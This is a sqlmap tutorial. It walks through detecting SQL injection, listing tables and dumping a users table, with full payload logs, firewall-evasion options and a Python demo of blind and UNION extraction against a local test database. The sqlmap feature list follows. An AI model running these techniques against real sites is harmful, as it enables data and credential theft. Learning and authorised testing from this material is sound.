
SQLmap Tutorial Introduction Kali Linux – Mac

Running sqlmap yourself is not difficult.
This tutorial will take you from noob to ninja with this powerful sql injection testing tool.

Sqlmap is a Python-based tool, so it runs on practically any system that has Python. We prefer Linux, and Ubuntu in particular, because it makes getting things done easy and Python is already installed. This is the same tool we use on our online SQL injection test site.


To get started with sqlmap, download the tool, unpack it, and run the command with the options you need. As there may be Windows users among you, I'll first cover how to get an Ubuntu install up and running. It is easy to get started on Ubuntu Linux, even if the thought of Linux sends shivers down your spine. Who knows, you may even like it.

Contents:
– SQL Injection Web Hacking with Kali Linux

Install SQLmap

Step 1: Get a Linux based Operating System

If you are going to run SQLmap on Windows with Python, make sure you have Python installed, and skip down to the next step.

Otherwise, get your Linux system fired up.

Either install a Linux virtual machine (Ubuntu or Kali recommended) on Windows (VirtualBox / VMware / Parallels) or boot up your Linux desktop.

If you run Microsoft Windows as your main operating system, it is convenient and simple to run an install of Ubuntu Linux (or Kali Linux) in a virtual machine.

You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools.

Step 2: SQLmap Installation

Python is pre-installed in Ubuntu, so all you need to do is clone the latest repository from git and start testing. (Kali Linux already ships sqlmap, so there you can simply run sqlmap from any directory instead of cloning.)

$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Cloning into 'sqlmap-dev'...
remote: Counting objects: 633, done.
remote: Compressing objects: 100% (602/602), done.
remote: Total 633 (delta 170), reused 171 (delta 20), pack-reused 0
Receiving objects: 100% (633/633), 7.17 MiB | 2.44 MiB/s, done.
Resolving deltas: 100% (170/170), done.

Change into the directory and run the python script to ensure all looks good.

$ cd sqlmap-dev
$ python sqlmap.py


       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help

If you do not see something like the output above, make sure Python is working (python -V prints the version) and that you are in the sqlmap-dev directory. That was the easy part; now let's move on.

To get a full list of the options available run python sqlmap.py -h.

Running SQLmap

Simple HTTP GET based test

In this simple test we send a standard HTTP GET request against a URL with one parameter (?id=5). sqlmap first checks that the page content is stable and that the id parameter is dynamic (changing its value changes the page), runs a quick heuristic check, and then works through the injection techniques against that parameter at the default --level 1 and --risk 1. Quote the URL so the shell does not interpret & in multi-parameter query strings.

python sqlmap.py -u 'http://mytestsite/page.php?id=5'

In the results we can see the different techniques tried against the parameter and which ones succeeded.


       ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:55:56

[12:55:56] [INFO] testing connection to the target URL
[12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'id' is dynamic
[12:55:58] [INFO] confirming that GET parameter 'id' is dynamic
[12:55:59] [INFO] GET parameter 'id' is dynamic
[12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:56:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac")
[12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:56:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:56:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:56:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:56:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:56:24] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:56:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:56:25] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:56:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:56:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:56:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:56:27] [INFO] testing 'MySQL inline queries'
[12:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:56:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:56:41] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[12:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:56:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:56:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:56:43] [INFO] target URL appears to have 3 columns in query
[12:56:46] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9561=9561

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:56:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[12:56:52] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite'

[*] shutting down at 12:56:52

Getting blocked by the Web Application Firewall (WAF)

sqlmap's default User-Agent header identifies itself as sqlmap, which many WAFs block outright. Try a different one with --random-agent, which picks a browser User-Agent from sqlmap's bundled list. If requests still get blocked, --delay (seconds to wait between requests) and the --tamper scripts that rewrite payloads are the next things to try.

$ python sqlmap.py -u "http://mytestsite/page.php?id=5" --random-agent
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.10.41#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:04 /2019-11-01/

Retrieve the Database Tables

SQLmap can be used to test and exploit SQL injection, extracting data from databases, updating tables and even popping shells on remote hosts if all the ducks are in line.

Let's retrieve the tables from the database using the SQL injection vulnerability we confirmed above. As you will see in the output below, we can continue testing against the target without re-testing the vulnerability: sqlmap stores the confirmed injection point in its session file under the output directory and resumes from it on the next run.

To retrieve data we simply add a parameter to the previous command. Adding --tables lists the tables in every database visible to the injected query, here the application database books plus MySQL's information_schema.

$ python sqlmap.py -u 'http://mytestsite/page.php?id=5' --tables

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:04

[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9561=9561

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:59:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12

Database: books
[8 tables]
+---------------------------------------+
| author                                |
| shoppingcarts                         |
| categories                            |
| featured                              |
| guestbook                             |
| pictures                              |
| products                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables] == snipped ==
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

[12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite'

[*] shutting down at 12:59:21

Dump the data

To get data we simply extend the command. Adding -T users focuses on the users table, where we might find credentials, and --dump tells sqlmap to grab all the data from it: the columns are enumerated first and then the rows are dumped. Without -D, sqlmap looks for the table in the current database (books here); add -D books to be explicit.

$ python sqlmap.py -u 'http://mytestsite/page.php?id=5' -T users --dump

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.41#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:04

[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
--- SNIP -----
Database: books
Table: users
[1 entry]
+--------+----------------------------------+------+------+---------+-------------------+---------+
| name   | cart                             | pass | user | phone   | email             | address |
+--------+----------------------------------+------+------+---------+-------------------+---------+
| Elliot | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test | 4563454 | test@testtest.com |         |
+--------+----------------------------------+------+------+---------+-------------------+---------+

[13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/mytestsite/dump/books/users.csv'
[13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/mytestsite'

[*] shutting down at 13:08:36
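The three sqlmap runs above (the GET detection run, --tables, and -T users --dump) can be reproduced by hand against a local stand-in, which is the quickest way to understand what the log lines mean. The following Python is an added example written for this page; it is not sqlmap code and not part of the original post. It builds an in-memory SQLite database with constructed sample data (a products table and a users table holding the same test/test row the dump returned), a page_vulnerable() function that concatenates the id parameter into SQL the way the tested page.php evidently did, and a page_safe() version that binds the value as a parameter. Against each it runs the checks sqlmap's log reported: the AND boolean-based blind true/false pair, the ORDER BY column count, and a marker-wrapped UNION query that lists tables and dumps users. The one substitution is the catalogue: sqlmap reads information_schema on MySQL, and SQLite's equivalents are sqlite_master and pragma_table_info().

```python
import re
import sqlite3

# Constructed stand-in for the 'books' MySQL database the tutorial enumerates.
# SQLite is used so the example runs offline; the schema and the test/test
# row mirror what the --tables and --dump runs above returned.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE products (id INTEGER, title TEXT, price REAL);
INSERT INTO products VALUES (5, 'hacking exposed', 29.95), (6, 'web app security', 39.95);
CREATE TABLE users (name TEXT, user TEXT, pass TEXT);
INSERT INTO users VALUES ('Elliot', 'test', 'test');
""")


def _render(rows) -> str:
    # Only the second column (the title) is reflected in the page, which is
    # why the UNION payload below places its marker string in column 2.
    return "<h1>Products</h1>" + "".join(f"<li>{r[1]}</li>" for r in rows)


def page_vulnerable(id_param: str) -> str:
    """page.php?id=... as sqlmap found it: the parameter is concatenated
    straight into the statement, so 'id=5 AND 1=2' changes the query."""
    sql = "SELECT id, title, price FROM products WHERE id=" + id_param
    try:
        return _render(_conn.execute(sql).fetchall())
    except sqlite3.Error:
        return "<h1>Error</h1>"


def page_safe(id_param: str) -> str:
    """Hardened version: the value is bound as a parameter, never parsed as SQL."""
    try:
        rows = _conn.execute(
            "SELECT id, title, price FROM products WHERE id=?", (int(id_param),)
        ).fetchall()
    except ValueError:
        return "<h1>Bad request</h1>"
    return _render(rows)


def boolean_blind_injectable(fetch, base="5") -> bool:
    """'AND boolean-based blind' check: a true condition must leave the page
    unchanged and a false one must change it (sqlmap's --string="hac" in the
    log is the substring it picked to tell the two responses apart)."""
    baseline = fetch(base)
    return (fetch(f"{base} AND 9561=9561") == baseline
            and fetch(f"{base} AND 9561=9562") != baseline)


def count_columns(fetch, base="5", limit=20) -> int:
    """The 'ORDER BY' technique from the log: ORDER BY n is accepted while n is
    within the column count and errors once it exceeds it. Returns 0 when no
    ORDER BY payload is accepted at all, i.e. the parameter is not injectable."""
    ok = fetch(base)
    for n in range(1, limit + 1):
        if fetch(f"{base} ORDER BY {n}") != ok:
            return n - 1
    raise RuntimeError(f"more than {limit} columns")


def union_extract(fetch, expr: str, source: str = "", columns: int = 3) -> list:
    """UNION query technique: negate the original row with an impossible id,
    then select our expression into the reflected column wrapped in marker
    strings. 0x7178786271 / 0x716b767a71 in sqlmap's payload are exactly these
    'qxxbq' / 'qkvzq' markers."""
    cells = ["NULL"] * columns
    cells[1] = f"'qxxbq' || {expr} || 'qkvzq'"
    payload = f"-6630 UNION ALL SELECT {','.join(cells)} {source}"
    return re.findall(r"qxxbq(.*?)qkvzq", fetch(payload))


def list_tables(fetch) -> list:
    # --tables: sqlmap reads information_schema.tables on MySQL; SQLite's
    # catalogue is sqlite_master.
    return union_extract(fetch, "name", "FROM sqlite_master WHERE type='table'")


def list_columns(fetch, table: str) -> list:
    # First half of --dump: enumerate the columns (information_schema.columns
    # on MySQL, pragma_table_info() on SQLite).
    return union_extract(fetch, "name", f"FROM pragma_table_info('{table}')")


def dump_users(fetch) -> list:
    # Second half of -T users --dump: pull the rows, one 'user:pass' per hit.
    return union_extract(fetch, "user || ':' || pass", "FROM users")


if __name__ == "__main__":
    for label, fetch in (("vulnerable", page_vulnerable), ("hardened", page_safe)):
        print(label, boolean_blind_injectable(fetch), count_columns(fetch),
              list_tables(fetch), list_columns(fetch, "users"), dump_users(fetch))
```

Run it and the vulnerable endpoint reports injectable, three columns, both tables and the test:test row, while the hardened endpoint fails every check: int() rejects the payloads before they reach the database, which is the whole point of binding parameters rather than filtering strings.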

SQLmap Tips – Go ninja on your SQL Injection Testing

Verbose output

When testing for SQL injection it is often necessary to dig into the individual requests, either to work out why a test is failing or to confirm and further exploit a discovered injection. Increasing sqlmap's verbosity with -v helps here: at -v 4 you see the HTTP requests, at -v 5 also the HTTP response headers, and at -v 6 the full HTTP response body. This gets very noisy, but sometimes you need to see exactly what is on the wire. Two related options worth knowing: -t <file> writes all HTTP traffic to a log file, and --proxy http://127.0.0.1:8080 routes every request through an intercepting proxy such as Burp so you can replay the payloads by hand.

Got Database Credentials?

If you already hold database credentials, this tip lets you point sqlmap straight at the database with -d and use the same enumeration and dump options (users, databases, tables) without any injection at all.

The nice thing about this is you don't have to remember the SQL syntax for each DBMS or have a client installed; sqlmap does the heavy lifting and acts as the database client. The direct connection does need the matching Python driver on your machine (for MySQL that is PyMySQL); if it is missing, sqlmap tells you which library to install.

DB connection strings (passed to -d):

MySQL, Oracle, Microsoft SQL Server, PostgreSQL
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
SQLite, Microsoft Access
DBMS://DATABASE_FILEPATH

Popping Shells and More

SQLmap has a ridiculous number of options and is an amazing tool for becoming one with a database. Apart from popping shells on the target host (--os-shell, where the DBMS and its privileges allow it), you can send requests through Tor (--tor), crawl a site for injectable parameters (--crawl), test the forms found in page responses (--forms) and, of course, perform HTTP POST based testing (--data, or -r with a saved request file).

These examples merely scratch the surface. Find more examples on the excellent GitHub wiki page.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

The sqlmap project is currently searching for sponsor(s)

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB and FrontBase database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice.
  • The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables.
  • This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Refer to the wiki for an exhaustive breakdown of the features.

Download

You can download the latest zipball or tarball.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Documentation

  • sqlmap User’s manual.
  • sqlmap History.
  • sqlmap Frequently Asked Questions (FAQ).
  • Material around sqlmap presented at conferences.

Demo


Watch more demos here.

Contribute

All code contributions are greatly appreciated. First off, clone the Git repository, read the user's manual carefully, go through the code yourself and drop us an email if you are having a hard time grasping its structure and meaning.

Bug reports are welcome! Please report all bugs on the issue tracker. Our preferred method of patch submission is via a Git pull request.

Each patch should make one logical change.

Please follow the existing stylistic conventions: wrap code to 76 columns when possible.

Avoid tabs, use four space characters instead.

Before you put time into a non-trivial patch, it is worth discussing it privately by email.

Many people have contributed in different ways to the sqlmap development. You can be the next!

Donate

sqlmap is the result of numerous hours of passionate work from a small team of computer security enthusiasts. If you appreciated our work and you want to see sqlmap kept being developed, please consider making a donation to our efforts via PayPal. We also accept Ƀitcoins to 1AUrrKYsamBEThdruYTQmUfMfLF7aaxU6x.

License

Copyright © 2006-2020 by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar. All rights reserved.

This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation;

Version 2 (or later) with the clarifications and exceptions described in the license file.

This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses.

Disclaimer

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;

without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License v2.0 for more details at  gnu .org/licenses/gpl-2.0.html.

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
